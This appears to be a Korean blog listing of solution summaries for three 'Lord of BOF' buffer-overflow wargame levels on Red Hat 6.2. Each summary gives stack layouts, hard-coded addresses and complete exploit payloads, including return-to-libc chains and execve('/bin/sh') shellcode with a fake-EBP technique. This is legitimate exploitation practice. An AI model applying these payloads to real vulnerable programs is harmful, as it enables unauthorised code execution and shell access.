본문 바로가기
LOB Redhat 6.2 - succubus succubus - PLTStack : *addr[4] + buffer[40] + sfp[4] + ret[4]strcpy(PLT) : 0x8048410buffer : 0xbffffa90strcpy_dest : 0xbffffac0 strcpy_source : 0xbffffa90Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'` Using strcpy + RTL 더보기
LOB Redhat 6.2 - zombie_assassin zomble_assassin - calling functions continuouslyStack : *addr[4] + buffer[40] + sfp[4] + ret[4]DO : 0x80487ec GYE : 0x80487bc GUL : 0x804878c YUT : 0x804875c MO : 0x8048724"/bin/sh" : 0xbffffa98Payload : ./succubus `python -c 'print "A"*44 + "\xec\x87\x04\x08" + "\xbc\x87\x04\x08" + "\x8c\x87\x04\x08" + "\x5c\x87\x04\x08" + "\x24\x87\x04\x08" + "AAAA" + "\x98\xfa\xff\xbf" + "/bin/sh"'` Using RTL.. 더보기
LOB Redhat 6.2 - assassin assassin - FEBPStack : buffer[40] + sfp[4] + ret[4]leave : 0x80484dfsfp : 0xbffffa88Payload : ./zombie_assassin `python -c 'print "\x90"*17 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x88\xfa\xff\xbf" + "\xdf\x84\x04\x08"'` Using FakeEBP 더보기

티스토리툴바